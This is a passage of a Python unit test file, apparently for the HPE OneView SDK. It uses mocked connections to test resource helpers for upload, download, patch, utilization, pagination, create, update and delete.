from hpOneView.connection import connection
from hpOneView import exceptions
from hpOneView.resources.resource import (ResourceClient, ResourceHelper, ResourceFileHandlerMixin,
ResourceZeroBodyMixin, ResourcePatchMixin, ResourceUtilizationMixin,
ResourceSchemaMixin, Resource,
RESOURCE_CLIENT_INVALID_ID, UNRECOGNIZED_URI, TaskMonitor,
RESOURCE_CLIENT_TASK_EXPECTED, RESOURCE_ID_OR_URI_REQUIRED,
transform_list_to_dict, extract_id_from_uri, merge_resources,
merge_default_values, unavailable_method)
class StubResourceFileHandler(ResourceFileHandlerMixin, Resource):
"""Stub class to test resource file operations"""
class StubResourceZeroBody(ResourceZeroBodyMixin, Resource):
"""Stub class to test resoruce zero body methods"""
class StubResourcePatch(ResourcePatchMixin, Resource):
"""Stub class to test resource patch operations"""
class StubResourceUtilization(ResourceUtilizationMixin, Resource):
"""Stub class to test resource utilization methods"""
class StubResourceSchema(ResourceSchemaMixin, Resource):
"""Stub class to test resource schema methods"""
class StubResource(Resource):
"""Stub class to test resource common methods"""
URI = "/rest/testuri"
class BaseTest(unittest.TestCase):
URI = "/rest/testuri"
TYPE_V200 = "typeV200"
TYPE_V300 = "typeV300"
DEFAULT_VALUES = {
"200": {"type": TYPE_V200},
"300": {"type": TYPE_V300}
}
def setUp(self, resource_client=None):
self.resource_client = resource_client
self.resource_client.URI = self.URI
self.resource_client.DEFAULT_VALUES = self.DEFAULT_VALUES
self.resource_client.data = {"uri": "/rest/testuri"}
self.resource_client._merge_default_values()
self.task = {"task": "task", "taskState": "Finished"}
self.response_body = {"body": "body"}
self.custom_headers = {"Accept-Language": "en_US"}
class ResourceFileHandlerMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceFileHandler(self.connection)
super(ResourceFileHandlerMixinTest, self).setUp(self.resource_client)
@mock.patch.object(connection, "post_multipart_with_response_handling")
def test_upload_should_call_post_multipart(self, mock_post_multipart):
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_post_multipart.assert_called_once_with(uri, filepath, "SPPgen9snap6.2015_0405.81.iso")
@mock.patch.object(connection, "post_multipart_with_response_handling")
def test_upload_should_call_post_multipart_with_resource_uri_when_not_uri_provided(self, mock_post_multipart):
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath)
mock_post_multipart.assert_called_once_with("/rest/testuri", mock.ANY, mock.ANY)
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
@mock.patch.object(connection, "get")
def test_upload_should_wait_for_task_when_response_is_task(self, mock_get, mock_wait4task, mock_post_multipart):
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.assert_called_once_with(self.task, -1)
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_upload_should_not_wait_for_task_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.not_been_called()
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
@mock.patch.object(connection, "get")
def test_upload_should_return_associated_resource_when_response_is_task(self, mock_get, mock_wait4task,
mock_post_multipart):
fake_associated_resurce = mock.Mock()
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
mock_wait4task.return_value = fake_associated_resurce
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_associated_resurce)
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_upload_should_return_resource_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
fake_response_body = mock.Mock()
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, fake_response_body
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_response_body)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_call_download_to_stream_with_given_uri(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
mock_open.return_value = io.StringIO()
self.resource_client.download(uri, file_path)
mock_download_to_stream.assert_called_once_with(mock.ANY, uri)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_call_download_to_stream_with_open_file(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
fake_file = io.StringIO()
mock_open.return_value = fake_file
self.resource_client.download(uri, file_path)
mock_open.assert_called_once_with(file_path, 'wb')
mock_download_to_stream.assert_called_once_with(fake_file, mock.ANY)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_return_true_when_success(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
mock_download_to_stream.return_value = True
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertTrue(result)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_return_false_when_error(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
mock_download_to_stream.return_value = False
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertFalse(result)
class ResourceZeroBodyMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceZeroBody(self.connection)
super(ResourceZeroBodyMixinTest, self).setUp(self.resource_client)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_called_once(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body()
mock_post.assert_called_once_with(
"/rest/testuri", {}, custom_headers=None)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_called_once_without_uri(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body(timeout=-1)
mock_post.assert_called_once_with(
"/rest/testuri", {}, custom_headers=None)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_and_custom_headers(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body(custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_return_entity(self, mock_wait4task, mock_post):
response_body = {"resource_name": "name"}
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = response_body
new_resource = self.resource_client.create_with_zero_body(timeout=-1)
self.assertNotEqual(new_resource, self.resource_client)
@mock.patch.object(connection, "post")
def test_create_with_zero_body_without_task(self, mock_post):
mock_post.return_value = None, self.response_body
new_resource = self.resource_client.create_with_zero_body()
self.assertNotEqual(new_resource, self.resource_client)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_with_zero_body_called_once(self, mock_wait4task, mock_update, mock_ensure_resource):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.URI = "/rest/enclosures"
self.resource_client.update_with_zero_body("/rest/enclosures/09USE133E5H4/configuration",
timeout=-1)
mock_update.assert_called_once_with(
"/rest/enclosures/09USE133E5H4/configuration", None, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_with_zero_body_and_custom_headers(self, mock_wait4task, mock_update, mock_ensure_resource):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.update_with_zero_body(uri="/rest/testuri", custom_headers=self.custom_headers)
mock_update.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_with_zero_body_return_entity(self, mock_wait4task, mock_put, mock_ensure_resource):
response_body = {"resource_name": "name"}
self.resource_client.URI = "/rest/enclosures"
mock_put.return_value = self.task, self.task
mock_wait4task.return_value = response_body
result = self.resource_client.update_with_zero_body(
"/rest/enclosures/09USE133E5H4/configuration", timeout=-1)
self.assertEqual(result, response_body)
@mock.patch.object(connection, "put")
def test_update_with_zero_body_without_task(self, mock_put):
mock_put.return_value = None, self.response_body
self.resource_client.URI = "/rest/enclosures"
result = self.resource_client.update_with_zero_body(
"/rest/enclosures/09USE133E5H4/configuration", timeout=-1)
self.assertEqual(result, self.response_body)
class ResourcePatchMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourcePatch(self.connection)
super(ResourcePatchMixinTest, self).setUp(self.resource_client)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_request_when_id_is_provided_v200(self, mock_patch, mock_ensure_resource):
uri = "/rest/testuri"
request_body = [{
"op": "replace",
"path": "/name",
"value": "new_name",
}]
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch("replace", "/name", "new_name")
mock_patch.assert_called_once_with(uri, request_body, custom_headers={})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_request_when_id_is_provided_v300(self, mock_patch, mock_ensure_resource):
request_body = [{
"op": "replace",
"path": "/name",
"value": "new_name",
}]
mock_patch.return_value = {}, {}
self.resource_client.patch("replace", "/name", "new_name")
mock_patch.assert_called_once_with(
"/rest/testuri", request_body, custom_headers={"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_request_when_uri_is_provided(self, mock_patch, mock_ensure_resource):
request_body = [{
"op": "replace",
"path": "/name",
"value": "new_name",
}]
mock_patch.return_value = {}, {}
self.resource_client.patch("replace", "/name", "new_name")
mock_patch.assert_called_once_with(
"/rest/testuri", request_body, custom_headers={"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_with_custom_headers_v200(self, mock_patch, mock_ensure_resource):
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch("operation", "/field", "value",
custom_headers=self.custom_headers)
mock_patch.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_with_custom_headers_v300(self, mock_patch, mock_ensure_resource):
mock_patch.return_value = {}, {}
self.resource_client.patch("operation", "/field", "value",
custom_headers=self.custom_headers)
mock_patch.assert_called_once_with(mock.ANY,
mock.ANY,
custom_headers={"Accept-Language": "en_US",
"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_patch_return_entity(self, mock_wait4task, mock_patch, mock_ensure_resource):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
self.resource_client.patch("replace", "/name", "new_name")
self.assertEqual(self.resource_client.data, entity)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "get_completed_task")
def test_patch_request_custom_headers_with_content_type(self, mock_task, mock_patch, mock_ensure_resource):
uri = "/rest/testuri"
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {"Content-Type": "application/json",
"Extra": "extra"}
self.connection._apiVersion = 300
self.resource_client.patch_request(uri, body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with(uri, dict_info, custom_headers=headers)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "get_completed_task")
def test_patch_request_custom_headers(self, mock_task, mock_patch, mock_ensure_resource):
uri = "/rest/testuri"
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {"Extra": "extra"}
self.connection._apiVersion = 300
self.resource_client.patch_request(uri, body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with(
uri,
dict_info,
custom_headers={"Extra": "extra",
"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_wait_for_activity_on_patch(self, mock_wait4task, mock_patch, mock_ensure_resource):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
self.resource_client.patch("replace", "/name", "new_name")
mock_wait4task.assert_called_once_with(self.task, mock.ANY)
class ResourceUtilizationMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceUtilization(self.connection)
super(ResourceUtilizationMixinTest, self).setUp(self.resource_client)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_with_args(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization(fields="AmbientTemperature,AveragePower,PeakPower",
filter="startDate=2016-05-30T03:29:42.361Z",
refresh=True, view="day")
expected_uri = "/rest/testuri/utilization" \
"?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z" \
"&fields=AmbientTemperature%2CAveragePower%2CPeakPower" \
"&refresh=true" \
"&view=day"
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_with_multiple_filters(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization(
fields="AmbientTemperature,AveragePower,PeakPower",
filter=["startDate=2016-05-30T03:29:42.361Z",
"endDate=2016-05-31T03:29:42.361Z"],
refresh=True,
view="day")
expected_uri = "/rest/testuri/utilization" \
"?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z" \
"&filter=endDate%3D2016-05-31T03%3A29%3A42.361Z" \
"&fields=AmbientTemperature%2CAveragePower%2CPeakPower" \
"&refresh=true" \
"&view=day"
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_by_id_with_defaults(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization()
expected_uri = "/rest/testuri/utilization"
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_by_uri_with_defaults(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization()
expected_uri = "/rest/testuri/utilization"
mock_get.assert_called_once_with(expected_uri)
class ResourceSchemaMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceSchema(self.connection)
super(ResourceSchemaMixinTest, self).setUp(self.resource_client)
@mock.patch.object(connection, "get")
def test_get_schema_uri(self, mock_get):
self.resource_client.get_schema()
mock_get.assert_called_once_with(self.URI + "/schema")
class ResourceTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResource(self.connection)
super(ResourceTest, self).setUp(self.resource_client)
self.resource_helper = ResourceHelper(self.URI, self.connection, None)
@mock.patch.object(ResourceHelper, "do_put")
@mock.patch.object(Resource, "ensure_resource_data")
def test_ensure_resource_should_call_once(self, mock_do_put, mock_ensure_resource):
self.resource_client.data = {"uri": "/rest/test"}
self.resource_client.update(data={"name": "test"})
mock_do_put.assert_called_once()
mock_ensure_resource.assert_called_once()
def test_ensure_resource_raise_unique_identifier_exception(self):
self.resource_client.data = []
self.assertRaises(exceptions.HPOneViewMissingUniqueIdentifiers,
self.resource_client.ensure_resource_data)
@mock.patch.object(ResourceHelper, "do_get")
def test_ensure_resource_raise_resource_not_found_exception_with_uri(self, mock_do_get):
self.resource_client.data = {"uri": "/uri/test"}
mock_do_get.return_value = []
with self.assertRaises(exceptions.HPOneViewResourceNotFound):
self.resource_client.ensure_resource_data(update_data=True)
@mock.patch.object(Resource, "get_by")
def test_ensure_resource_raise_resource_not_found_exception_without_uri(self, mock_get_by):
self.resource_client.data = {"name": "testname"}
mock_get_by.return_value = []
with self.assertRaises(exceptions.HPOneViewResourceNotFound):
self.resource_client.ensure_resource_data(update_data=True)
@mock.patch.object(ResourceHelper, "do_get")
@mock.patch.object(Resource, "get_by")
def test_ensure_resource_should_update_resource_data(self, mock_do_get, mock_get_by):
get_by_return_value = [{"name": "testname", "uri": "/rest/testuri"}]
self.resource_client.data = {"name": "testname"}
mock_do_get.return_value = get_by_return_value
self.resource_client.ensure_resource_data(update_data=True)
self.assertEqual(self.resource_client.data, get_by_return_value[0])
@mock.patch.object(Resource, "get_by")
def test_ensure_resource_without_data_update(self, mock_get_by):
mock_get_by.return_value = []
actual_result = self.resource_client.ensure_resource_data(update_data=False)
expected_result = None
self.assertEqual(actual_result, expected_result)
@mock.patch.object(connection, "get")
def test_get_all_called_once(self, mock_get):
filter = "'name'='OneViewSDK \"Test FC Network'"
sort = "name:ascending"
query = "name NE 'WrongName'"
mock_get.return_value = {"members": [{"member": "member"}]}
result = self.resource_helper.get_all(
1, 500, filter, query, sort)
uri = "{resource_uri}?start=1" \
"&count=500" \
"&filter=%27name%27%3D%27OneViewSDK%20%22Test%20FC%20Network%27" \
"&query=name%20NE%20%27WrongName%27" \
"&sort=name%3Aascending".format(resource_uri=self.URI)
self.assertEqual([{"member": "member"}], result)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_defaults(self, mock_get):
self.resource_client.get_all()
uri = "{resource_uri}?start=0&count=-1".format(resource_uri=self.URI)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_custom_uri(self, mock_get):
self.resource_helper.get_all(uri="/rest/testuri/12467836/subresources")
uri = "/rest/testuri/12467836/subresources?start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_custom_uri_and_query_string(self, mock_get):
self.resource_helper.get_all(uri="/rest/testuri/12467836/subresources?param=value")
uri = "/rest/testuri/12467836/subresources?param=value&start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_different_resource_uri_should_fail(self, mock_get):
try:
self.resource_helper.get_all(uri="/rest/other/resource/12467836/subresources")
except exceptions.HPOneViewUnknownType as e:
self.assertEqual(UNRECOGNIZED_URI, e.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, "get")
def test_get_all_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ["/rest/testuri?start=0&count=-1",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=3"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}, {"id": "8"}]}]
mock_get.side_effect = results
self.resource_client.get_all()
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, "get")
def test_get_all_with_count_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ["/rest/testuri?start=0&count=15",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=3"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{'nextPageUri': None, "members": [{"id": "7"}, {"id": "8"}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=15)
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, "get")
def test_get_all_should_return_all_items_when_response_paginated(self, mock_get):
uri_list = ["/rest/testuri?start=0&count=-1",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=1"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}]}]
mock_get.side_effect = results
result = self.resource_client.get_all()
expected_items = [{'id': '1'}, {'id': '2'}, {'id': '3'}, {'id': '4'}, {'id': '5'}, {'id': '6'}, {'id': '7'}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, 'get')
def test_get_all_should_limit_results_to_requested_count_when_response_is_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=15',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=1']
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}]}]
mock_get.side_effect = results
result = self.resource_client.get_all(count=15)
expected_items = [{"id": "1"}, {"id": "2"}, {"id": "3"}, {"id": "4"}, {"id": "5"}, {"id": "6"}, {"id": "7"}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, "get")
def test_get_all_should_stop_requests_when_requested_count_reached(self, mock_get):
"""
In this case, the user provides a maximum number of results to be returned but for pagination purposes, a
nextPageUri is returned by OneView.
"""
uri_list = ["/rest/testuri?start=0&count=3",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=3"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}, {"id": "8"}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=3)
mock_get.assert_called_once_with(uri_list[0])
@mock.patch.object(connection, "get")
def test_get_all_should_stop_requests_when_next_page_is_equal_to_current_page(self, mock_get):
uri = "/rest/testuri?start=0&count=-1"
members = [{"id": "1"}, {"id": "2"}, {"id": "3"}]
mock_get.return_value = {
"nextPageUri": uri,
"members": members,
"uri": uri
}
result = self.resource_client.get_all()
self.assertSequenceEqual(result, members)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_should_return_empty_list_when_response_has_no_items(self, mock_get):
mock_get.return_value = {"nextPageUri": None, "members": []}
result = self.resource_client.get_all()
self.assertEqual(result, [])
@mock.patch.object(connection, "get")
def test_get_all_should_return_empty_list_when_no_members(self, mock_get):
mock_get.return_value = {"nextPageUri": None, "members": None}
result = self.resource_client.get_all()
self.assertEqual(result, [])
@mock.patch.object(ResourceHelper, "do_get")
def test_refresh(self, mock_do_get):
updated_data = {"resource_name": "updated name"}
mock_do_get.return_value = updated_data
self.resource_client.refresh()
self.assertEqual(self.resource_client.data, updated_data)
@mock.patch.object(connection, "post")
def test_create_uri(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
expected_dict = {"resource_name": "a name", "type": self.TYPE_V300}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_with_api_version_200(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client._merge_default_values()
expected_dict = {"resource_name": "a name", "type": self.TYPE_V200}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_with_default_api_version_300(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
expected_dict = {"resource_name": "a name", "type": self.TYPE_V300}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_should_not_override_resource_properties(self, mock_post):
dict_to_create = {"resource_name": "a name", "type": "anotherType"}
mock_post.return_value = {}, {}
expected = {"resource_name": "a name", "type": "anotherType"}
self.resource_client.create(dict_to_create)
mock_post.assert_called_once_with(self.URI, expected, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_without_default_values(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, "post")
def test_create_with_custom_headers(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(connection, "post")
def test_create_should_return_new_resource_instance(self, mock_post):
mock_post.return_value = {}, {}
new_instance = self.resource_client.create({})
self.assertNotEqual(self.resource_client, new_instance)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_wait_for_activity_on_create(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, {}
mock_wait4task.return_value = self.task
self.resource_client.create({"test": "test"}, timeout=60)
mock_wait4task.assert_called_once_with(self.task, 60)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "delete")
def test_delete_should_return_true(self, mock_delete, mock_ensure_resource):
mock_delete.return_value = None, self.response_body
self.resource_client.data = {"uri": "/rest/testuri"}
result = self.resource_client.delete()
self.assertTrue(result)
@mock.patch.object(connection, 'delete')
def test_helper_delete_all_should_return_true(self, mock_delete):
mock_delete.return_value = None, self.response_body
filter = "name='Exchange Server'"
result = self.resource_helper.delete_all(filter=filter, force=True, timeout=-1)
self.assertTrue(result)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "delete")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_delete_with_force(self, mock_ensure_resource, mock_delete, mock_wait4task):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.data = {"uri": "/rest/testuri"}
self.resource_client.delete(force=True)
mock_delete.assert_called_once_with("/rest/testuri?force=True", custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "delete")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_delete_with_custom_headers(self, mock_ensure_resource, mock_delete, mock_wait4task):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.data = {"uri": "/rest/testuri"}
self.resource_client.delete(custom_headers=self.custom_headers)
mock_delete.assert_called_once_with(mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_uri_called_once(self, mock_put, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"name": "test", "type": "typeV300"}
self.resource_client.data = {'uri': uri}
expected = {"name": "test", "type": "typeV300", "uri": uri}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update)
self.assertEqual(self.response_body, self.resource_client.data)
mock_put.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_custom_headers(self, mock_put, mock_ensure_resource):
dict_to_update = {"name": "test"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, custom_headers=self.custom_headers)
mock_put.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_force(self, mock_put, mock_laod_resource):
dict_to_update = {"name": "test"}
uri = "/rest/testuri"
expected = {"name": "test", "uri": uri, "type": "typeV300"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update)
expected_uri = "/rest/testuri"
mock_put.assert_called_once_with(expected_uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_with_default_api_version_300(self, mock_put, mock_ensure_resource):
dict_to_update = {"name": "test"}
uri = "/rest/testuri"
mock_put.return_value = None, self.response_body
expected_dict = {"name": "test", "type": self.TYPE_V300, "uri": uri}
self.resource_client._merge_default_values()
self.resource_client.update(dict_to_update)
mock_put.assert_called_once_with(uri, expected_dict, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_should_not_override_resource_properties(self, mock_put, mock_ensure_resource):
dict_to_update = {"name": "test", "type": "anotherType"}
uri = "/rest/testuri"
mock_put.return_value = None, self.response_body
expected = {"name": "test", "type": "anotherType", "uri": uri}
self.resource_client.update(dict_to_update)
